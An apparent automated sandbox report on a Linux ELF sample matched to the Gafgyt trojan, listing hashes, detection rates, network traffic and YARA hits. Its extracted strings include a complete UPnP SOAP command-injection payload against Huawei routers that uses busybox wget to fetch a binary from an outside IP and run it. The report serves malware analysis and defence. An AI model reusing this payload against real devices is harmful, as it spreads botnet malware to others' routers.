Linux Analysis Report
r41xp4rOln.elf

ID:	830737
Product:	CloudBasic
Start time:	16:47:30
Start date:	20.03.2023
Sample:	r41xp4rOln.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	b4a329fd91d515cb3244886b5272503d
SHA1:	e403940645e7292328eb6b9a7f47c25b08dc228d
SHA256:	de5e60ab541838c4c3cb0bfd0733417f2fe4a19bac08683391022cdaabe263de
Filetype:	ELF Executable and Linkable format (generic) (4004/1) 100.00%

Name	Type	MD5	SHA1	SHA256

AV Detection

Source: r41xp4rOln.elf	ReversingLabs: Detection: 58%
Source: r41xp4rOln.elf	Virustotal: Detection: 62%			Perma Link

Networking

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: global traffic

TCP traffic: 192.168.2.23:51628 -> 103.161.181.97:56999

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 103.161.181.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43

Source: r41xp4rOln.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: r41xp4rOln.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Source: r41xp4rOln.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6224.1.00007f28d8028000.00007f28d8029000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 6224.1.00007f28d8017000.00007f28d8021000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: r41xp4rOln.elf PID: 6224, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown

Source: r41xp4rOln.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6224.1.00007f28d8028000.00007f28d8029000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6224.1.00007f28d8017000.00007f28d8021000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: r41xp4rOln.elf PID: 6224, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16

Source: ELF static info symbol of initial sample

.symtab present: no

Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	String containing 'busybox' found: bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/busybox/bin/watchdog/bin/systemdH

Source: classification engine

Classification label: mal64.troj.linELF@0/0@0/0

Malware Analysis System Evasion

Source: /tmp/r41xp4rOln.elf (PID: 6224)

Queries kernel information via 'uname':

Jump to behavior

Source: r41xp4rOln.elf, 6224.1.00007ffdd0b85000.00007ffdd0ba6000.rw-.sdmp	Binary or memory string: ~x86_64/usr/bin/qemu-arm/tmp/r41xp4rOln.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/r41xp4rOln.elf
Source: r41xp4rOln.elf, 6224.1.00007ffdd0b85000.00007ffdd0ba6000.rw-.sdmp	Binary or memory string: qemu: %s: %s
Source: r41xp4rOln.elf, 6224.1.00007ffdd0b85000.00007ffdd0ba6000.rw-.sdmp	Binary or memory string: leqemu: %s: %s
Source: r41xp4rOln.elf, 6224.1.00005633b74e4000.00005633b7612000.rw-.sdmp	Binary or memory string: 3V!/etc/qemu-binfmt/arm
Source: r41xp4rOln.elf, 6224.1.00005633b74e4000.00005633b7612000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: r41xp4rOln.elf, 6224.1.00007ffdd0b85000.00007ffdd0ba6000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: r41xp4rOln.elf, 6224.1.00005633b74e4000.00005633b7612000.rw-.sdmp	Binary or memory string: rg.qemu.gdb.arm.sys.regs">
Source: r41xp4rOln.elf, 6224.1.00005633b74e4000.00005633b7612000.rw-.sdmp	Binary or memory string: 3Vrg.qemu.gdb.arm.sys.regs">

Stealing of Sensitive Information

Source: Yara match	File source: r41xp4rOln.elf, type: SAMPLE
Source: Yara match	File source: 6224.1.00007f28d8017000.00007f28d8021000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match	File source: r41xp4rOln.elf, type: SAMPLE
Source: Yara match	File source: 6224.1.00007f28d8017000.00007f28d8021000.r-x.sdmp, type: MEMORY